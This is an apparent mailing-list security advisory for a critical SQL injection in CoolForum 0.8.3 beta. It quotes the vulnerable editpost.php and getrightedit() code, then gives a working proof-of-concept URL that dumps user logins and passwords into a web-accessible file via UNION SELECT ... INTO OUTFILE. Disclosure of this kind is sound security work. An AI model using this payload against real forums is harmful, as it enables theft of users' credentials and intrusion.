Type: SQL Injection

Risk: Critical

Product: CoolForum <= 0.8.3 beta

********************************



Vulnerability

*************

// File: editpost.php

// Line 38

//

if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);

else $post = 0;

--

// Line 77

//

$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);

--

// File: admin/functions.php

// Line 623

//

function getrightedit($idpost,$forumid)

{

global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;

$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE 
idpost=".$idpost);

$j = mysql_fetch_array($query);

--



Proof Of Concept

****************

http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password 
FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1



Credits

*******

Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt

Note: Others SQL Injection exists but they are difficult to exploit

by DarkFig

Reply via email to